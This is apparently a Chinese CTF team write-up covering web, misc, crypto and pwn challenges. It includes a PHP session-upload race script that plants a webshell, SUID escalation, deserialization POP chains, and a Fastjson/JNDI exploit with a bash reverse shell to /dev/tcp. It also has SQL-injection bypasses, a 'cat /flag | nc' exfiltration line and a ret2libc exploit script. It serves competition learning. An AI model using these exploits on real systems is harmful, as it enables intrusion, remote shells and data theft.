web

rce_me

(empty($_GET["file"])) ? highlight_file(__FILE__) : $file=$_GET["file"];function fliter($var): bool{     $blacklist = ["<","?","$","[","]",";","eval",">","@","_","create","install","pear"];         foreach($blacklist as $blackword){           if(stristr($var, $blackword)) return False;    }    return True;}  if(fliter($_SERVER["QUERY_STRING"])){include $file;}else{die("Noooo0");}

获取webshell，题目中过滤了很多字符，但是可以利用echo写shell,参考链接
https://blog.csdn.net/chizhaji/article/details/113521985?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-113521985-blog-111184583.pc_relevant_multi_platform_whitelistv4&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-113521985-blog-111184583.pc_relevant_multi_platform_whitelistv4&utm_relevant_index=1
发现需要同时发包，利用脚本也可以直接发包

# coding=utf-8import ioimport requestsimport threadingsessid = 'flag'data = {"cmd": "system('cat f*');"}url = "http://80.endpoint-9588ad86d7e34833b12f992204ec90da.dasc.buuoj.cn:81/"def write(session):    while True:        f = io.BytesIO(b'a' * 1024 * 50)        resp = session.post(url,data={"PHP_SESSION_UPLOAD_PROGRESS":"');?>"},files={'file': ('tgao.txt', f)}, cookies={'PHPSESSID': sessid})def read(session):    while True:        resp = session.post(url+'?file=/tmp/sess_' + sessid,data=data)        if 'tgao.txt' in resp.text:            print(resp.text)            event.clear()        else:            passif __name__ == "__main__":    event = threading.Event()    with requests.session() as session:        for i in range(1, 30):            threading.Thread(target=write, args=(session,)).start()        for i in range(1, 30):            threading.Thread(target=read, args=(session,)).start()    event.set()

脚本会响应10秒左右报错。但是shell上传成功
读取不到flag，需要提权
内核是Linux，考虑suid提权
find / -perm -u=s -type f 2>/dev/null
利用date来提权
获取flag

step_by_step-v3

error_reporting(0);class yang{    public $y1;    public function __construct()    {        $this->y1->magic();    }    public function __tostring()    {        ($this->y1)();    }    public function hint()    {        include_once('hint.php');        if(isset($_GET['file']))        {            $file = $_GET['file'];            if(preg_match("/$hey_mean_then/is", $file))            {                die("nonono");            }            include_once($file);        }    }}class cheng{    public $c1;    public function __wakeup()    {        $this->c1->flag = 'flag';    }    public function __invoke()    {        $this->c1->hint();    }}class bei{    public $b1;    public $b2;    public function __set($k1,$k2)    {        print $this->b1;    }    public function __call($n1,$n2)    {        echo $this->b1;    }}if (isset($_POST['ans'])) {    unserialize($_POST['ans']);} else {    highlight_file(__FILE__);}?>

看代码可以直接调用tostring执行phpinfo，因此直接给类yang y1变量给phpinfo,赋值之后会调用bei类中__set方法，再去调用cheng类中tostring方法执行phpinfo
pop链

class yang{    public $y1;}class cheng{    public $c1;}class bei{    public $b1;    public $b2;}$yang=new yang();$cheng=new cheng();$bei=new bei();$yang->y1="phpinfo";$bei->b1=$yang;$cheng->c1=$bei;echo serialize($cheng);?>

info中直接搜索flag

simple_json

打开附件是一个java的包，翻看源码包发现几个可疑点
存在三个路由:
版本为1.8
有2个log4j的包，并且有在Test.class下存在可疑的攻击点
转换json格式

{    "content":{        "@type":"ycb.simple_json.service.JNDIService",        "target":"ldap://101.33.211.155:8087/aaa"    },    "msg":{        "$ref":"$.content.context"    }}

所以开始构造
需要用到的工具：https://github.com/Bl0omZ/JNDIEXP

利用链特殊说明snakeyaml ： command=http://127.0.0.1:8080/exp.jar 加载恶意类。可以使用提供的yaml-payload-master(需要修改代码，重新生成jar，内附使用说明)。无法使用reverseshell。ldap://ip:port/bypass/snakeyaml/http://127.0.0.1:8080/exp.jarldap://ip:port/bypass/snakeyaml/base64/aHR0cDovLzEyNy4wLjAuMTo4MDgwL2V4cC5qYXI%3DC3p0 ：command=http://127.0.0.1:8080:Exploit(端口为默认为8080) data目录下的Exploit可以进行参考,直接修改Exploit.java的命令使用javac编译(不用另外起http服务)ldap://ip:port/bypass/snakeyaml/http://127.0.0.1:8080:Exploitldap://ip:port/bypass/snakeyaml/base64/aHR0cDovLzEyNy4wLjAuMTo4MDgwOkV4cGxvaXQ%3D

参照这个进行
修改vps地址,再编译，放到工具的同级目录

  8 public class AwesomeScriptEngineFactory implements ScriptEngineFactory {  9 10     public AwesomeScriptEngineFactory() { 11         try { 12             Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/xx.xx.xx/9998 0>&1"); 13         } catch (IOException e) { 14             e.printStackTrace(); 15         } 16     }

用python3起一个http服务

python3 -m http.server 905

将JNDIInject-1.2-SNAPSHOT.jar服务起来
nc监听
burp发包触发

POST /ApiTest/post HTTP/1.1Host: 8080.endpoint-914652473867461dae1d005085b13c95.dasc.buuoj.cn:81Content-Length: 258Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Origin: http://8080.endpoint-914652473867461dae1d005085b13c95.dasc.buuoj.cn:81Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://8080.endpoint-914652473867461dae1d005085b13c95.dasc.buuoj.cn:81/ApiTestAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{   "content":{     "@type":"ycb.simple_json.service.JNDIService",     "target":     "ldap://xx.xx.xx.xx:1389/snakeyaml/http://xx.xx.xx:905/exp.jar"    },    "msg":{      "$ref":"$.content.context"    }}

shell弹回来了
获取flag

ComeAndLogin

题目为登录可能存在注入
扫描目录存在5个文件访问
只有admin.php页面才能访问，需要admin权限
抓包发现username&password都存在注入
FUZZ发现username处过滤了单引号，并且%27,十六进制都被过滤，直接用反斜杠可以

页面返回正常
接着在password上测试，发现过滤了空格，考虑都使用url编码绕过
登录成功
再访问admin.php
根据代码提示需要以POST接收path参数的值，并且需要有大于三个以上的/,绕过即可
https://blog.csdn.net/m0_62805300/article/details/124218779
在参考文章中使用软连接获取flag
构造payload:

path=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/flag

Safepop

原题链接：https://xz.aliyun.com/t/10961

class Fun{    private $func;    public function __construct(){    $this->func = [new Test,'getFlag'];//也可以写为$this->func = "Test::getFlag";这样由于没有实例化Test类，还不会触发Test里的__wakeup()    }}class Test{    public function getFlag(){    }}class A{    public $a;}class B{    public $p;}$Test = new Test;$Fun = new Fun;$a = new A;$b = new B;$a->a = $Fun;$b->a = $a;$r = serialize($b);$r1 = str_replace('"Fun":1:','"Fun":2:',$r);echo urlencode($r1);

不用改直接贴
payload:

?pop=O%3A1%3A%22B%22%3A2%3A%7Bs%3A1%3A%22p%22%3BN%3Bs%3A1%3A%22a%22%3BO%3A1%3A%22A%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A3%3A%22Fun%22%3A2%3A%7Bs%3A9%3A%22%00Fun%00func%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A4%3A%22Test%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22getFlag%22%3B%7D%7D%7D%7D

MISC

签到

寻宝

file = open('./寻宝','rb').read()datalist = ('{:02X}'.format(int(i)) for i in file)print(datalist)out = open('./1.txt','w')for j in list(datalist):    j = j[::-1]    out.write(j+'')

解出的文本是十六进制
解出之后为
根据游戏和提示得到钢琴判断字符114514
根据图片看出为差分曼切斯特编码01011111011000010011000101011111解出为_a1_
获取flag.zip密码
零宽度字符隐写

迷失幻境

取证题目，刚好有取证大师
将镜像放入取证大师
存在两个文件，一个是45文本文件，一个是jpg文件
挨个分析两个文件
首先是45文本文件，找了一个正常的png图片和在取证大师的十六进制中45文件对比，发现文件具备png的头部信息，但是缺少png头
将45文件，放入010加补全头部信息
提取出来完整的png图
接着在在取证大师的PNG文件有99张图，抽样分析发现图都是一样的，迷惑而已
导出PNG图，用Stegolve工具异或
接着分析jpg图，是一个萝莉照片，人畜无害
结合png图的key：可莉前来报道 ，应该是跟萝莉图有关
既然有密码也有图，图片也没有加密，只有考虑为隐写了，使用outguess工具得到flag

outguess -k "可莉前来报道" -r /home/kali/Desktop/test1/h.jpg flag.txt

where_is_secret

解出压缩包
再通过https://shimo.im/docs/gwpcxkryVJwyJVHR/read里的一起看小说吗

from PIL import Imagedef decode(im):    width,height = im.size    lst = []    for y in range(height):        for x in range(width):            red,green,blue = im.getpixel((x,y))            if(blue | green | red) == 0:                break            index = (green<<8) + blue            lst.append(chr(index))    return ''.join(lst)if __name__=='__main__':    all_text = decode(Image.open("./out.bmp","r"))    with open ("decode.text","w",encoding = "utf-8") as f:        f.write(all_text)

通过筛选{}中间的值就可以得到h1d3_1n_th3_p1ctur3

Unlimited Zip Works

解压看到有注释
用zipfile分析压缩包信息并提取注释信息
看到注释里面还有个压缩包
直接提取注释中的压缩包

import zipfilename = 'file'infolist = []num = 1newzip=b''while True:    fz = zipfile.ZipFile(name + '.zip', 'r')    for i in fz.namelist():        if "zip" in i:            filename = i[0:5]            # print(filename)    fz.extractall(pwd=bytes(filename, 'utf-8'))    num += 1    name = filename    for j in fz.infolist():        infolist.append(j.comment)        if 'flag.txt' in str(j):            print('[+] 解压完成')            list2 = infolist[::-1]            for k in list2:                newzip += k            with open('./newfile.zip','wb') as f:                f.write(newzip)                print("[+] 成功生成新压缩包newfile.zip")            exit(0)

新压缩包中还套着压缩包

from zipfile import ZipFiledata = []with ZipFile( 'newfile.zip', 'r') as zf:    for i in zf.infolist():        data.append(i.extra)with open('flag.zip','wb') as fz:    for i in data:        fz.write(i)

脚本直接提
图片没什么内容
010分析下面又是压缩包直接提

躲猫猫

在流量包里发现有个zip将它导出

找到一张png图片

发现压缩包里的key.log是没有加密的把它导入加解密之后在http2流量里发现了一张jpg图片将它导出

找到压缩包密码

解出压缩包
看到脚本之后发现是某ctf原题改一下x，y解密出来一张图片
https://blog.csdn.net/weixin_51122085/article/details/125851791
看到图片猜测为Dotcode但是发现这个中间是圆形或者正方形而解密出来的图片是五边形
在左侧列表中看到Maxicode中间是五边形的

CRYPTO

Easyrsa

import gmpy2p = 7552850543392291177573335134779451826968284497191536051874894984844023350777357739533061306212635723884437778881981836095720474943879388731913801454095897c = 38127524839835864306737280818907796566475979451567460500065967565655632622992572530918601432256137666695102199970580936307755091109351218835095309766358063857260088937006810056236871014903809290530667071255731805071115169201705265663551734892827553733293929057918850738362888383312352624299108382366714432727f = open('output.txt','r')for i in f.readlines()[::-1]:    e = 65537    n = int(i)    q = n//p    d = int(gmpy2.invert(e, (p - 1) * (q - 1)))    m = pow(c, d, n)    c = mprint(bytes.fromhex(hex(m)[2:]))f.close()

lrsa

$$t=(p-58)P+q-kQ\\\\kQ-(p-58)P=q-t\approx q\\\\L=\begin{pmatrix}1&P\\&Q\end{pmatrix}\\\\b=(58-p,k)L=(58-p,q-t)\\\\|b|\le2^{\frac{1}{4}}det(L)^{\frac{1}{2}}$$

由上面的式子关系，可以直接格出q-t，而t已知且很小，那么就能得到q

from Crypto.Util.number import *B=1023PPQ=17550772391048142376662352375650397168226219900284185133945819378595084615279414529115194246625188015626268312188291451580718399491413731583962229337205180301248556893326419027312533686033888462669675100382278716791450615542537581657011200868911872550652311318486382920999726120813916439522474691195194557657267042628374572411645371485995174777885120394234154274071083542059010253657420242098856699109476857347677270860654429688935924519805555787949683144015873225388396740487817155358042797286990338440987035608851331840925854381286767024584195081004360635842976624747610461507795755042915965483135990495921912997789567020652729777216671481467049291624343256152446367091568361258918212012737611001009003078023715854575413979603297947011959023398306612437250872299406744778763429172689675430968886613391356192380152315042387148665654062576525633130546454743040442444227245763939134967515614637300940642555367668537324892890004459521919887178391559206373513466653484926149453481758790663522317898916616435463486824881406198956479504970446076256447830689197409184703931842169195650953917594642601134810084247402051464584676932882503143409428970896718980446185114397748313655630266379123438583315809104543663538494519415242569480492899140190587129956835218417371308642212037424611690324353109931657289337536406499314388951678319136343913551598851601805737870217800009086551022197432448461112330252097447894028786035069710260561955740514091976513928307284531381150606428802334767412638213776730300093872457594524254858721551285338651364457529927871215183857169772407595348187949014442596356406144157105062291018215254440382214000573515515859668018846789551567310531570458316720877172632139481792680258388798439064221051325274383331521717987420093245521230610073103811158660291643007279940393509663374960353315388446956868294358252276964954745551655711981PQQ=17632503734712698604217167790453868045296303200715867263641257955056721075502316035280716025016839471684329988600978978424661087892466132185482035374940487837109552684763339574491378951189521258328752145077889261805000262141719400516584216130899437363088936913664419705248701787497332582188063869114908628807937049986360525010012039863210179017248132893824655341728382780250878156526086594253092249935304259986328308203344932540888448163430113818706295806406535364433801544858874357459282988110371175948011077595778123265914357153104206808258347815853145593128831233094769191889153762451880396333921190835200889266000562699392602082643298040136498839726733129090381507278582253125509943696419087708429546384313035073010683709744463087794325058122495375333875728593383803489271258323466068830034394348582326189840226236821974979834541554188673335151333713605570214286605391522582123096490317734786072061052604324131559447145448500381240146742679889154145555389449773359530020107821711994953950072547113428811855524572017820861579995449831880269151834230607863568992929328355995768974532894288752369127771516710199600449849031992434777962666440682129817924824151147427747882725858977273856311911431085373396551436319200582072164015150896425482384248479071434032953021738952688256364397405939276917210952583838731888536160866721278250628482428975748118973182256529453045184370543766401320261730361611365906347736001225775255350554164449014831203472238042057456969218316231699556466298168668958678855382462970622819417830000343573014265235688391542452769592096406400900187933156352226983897249981036555748543606676736274049188713348408983072484516372145496924391146241282884948724825393087105077360952770212959517318021248639012476095670769959011548699960423508352158455979906789927951812368185987838359200354730654103428077770839008773864604836807261909t=44c=4364802217291010807437827526073499188746160856656033054696031258814848127341094853323797303333741617649819892633013549917144139975939225893749114460910089509552261297408649636515368831194227006310835137628421405558641056278574098849091436284763725120659865442243245486345692476515256604820175726649516152356765363753262839864657243662645981385763738120585801720865252694204286145009527172990713740098977714337038793323846801300955225503801654258983911473974238212956519721447805792992654110642511482243273775873164502478594971816554268730722314333969932527553109979814408613177186842539860073028659812891580301154746PQ=GCD(PPQ,PQQ)P=PPQ//PQQ=PQQ//PQ# sage P,Q,t=25947339118736016261419550658264175914664266822085997909314096786508816404704696671837899420298768803641977765786592354116676036035881712512184992851487828263900367476619650087372125353190561974783134059421570649293920248116730478378196277387377082481961542018611824082110164117796622604412648512092528479878502094797494405077897059911764470830302447618882229233093021156725194893124743848364119720591518073753197359351271987724752861168913839307431377592888760273762302003490303315903644695784992125784390012046834505490167165377346036077504298195544062111718133371983287540723388743607671934081891907851056034062109,26068172028162605137516470004551766376185367701690988148920400408760716114172673253571631718337447931195718779018987169967053546674529251665443499183399035216407895285607965767100708187327533611193709308966698251023076404422362272378862918994525181107002728889256377161661579892599243396304207048944032235378667269998644227976609632271355152717352269223310163307304914315780234040829575689991453848537587516055955657960061856059046256125836544109066275645648666876772298883460637600522819402448386193499472702636751025558486665290530268273787746964353937663176851849214999005525738643454160169651485201028944583316101,44# L=matrix(ZZ,[[1,P],[0,Q]])# print(L.LLL()[0][1])a=71239161441539946834999944364158306978517617517717217001776063773301330324729178632534286023377366747004115034635139042058644768011502688969022553791977558750633767627495955645170437100983708648876951588485253787441732757259210010467734037546118780321368088487269039555130213851691659851510403573663333586407assert isPrime(a+t)q=a+te=65537d=inverse(e,q-1)m=pow(c,d,q)print(long_to_bytes(m))

PWN

.shell cat/flag | nc 124.223.104.219 1234

fakeNoOutput-v2

from pwn import*context.log_level='debug'elf=ELF('fakeNoOutput')p=remote('tcp.dasc.buuoj.cn',20112)#p=process('./fakeNoOutput')libc = ELF('libc.so.6')head='''head /upload HTTP/1.1HTTP_SERVER1_token: User-Agent: Cookie: Referer: Content-Length: 4196'''p.sendline(head)p.sendline('Content:filename=')text = 0x080496A1main = 0x8049F77setbuf = elf.got['fwrite']payload='a'*0x1040payload+='bbbb'payload+=p32(text)payload+=p32(main)payload+=p32(setbuf)p.sendline(payload + '\n')p.recvuntil('Connection: close\r\n\r\n')p.recvuntil('Connection: close\r\n\r\n')libc_base = u32(p.recv(4))-libc.sym['fwrite']system = libc_base+libc.sym['system']binsh = libc_base+libc.search('/bin/sh').next()p.sendline(head)p.sendline('Content:filename=')payload='a'*0x1040payload+='bbbb'payload+=p32(system)payload+='bbbb'payload+=p32(binsh)p.sendline(payload + '\n')p.interactive()

来源地址：https://blog.csdn.net/xjh8023/article/details/126688058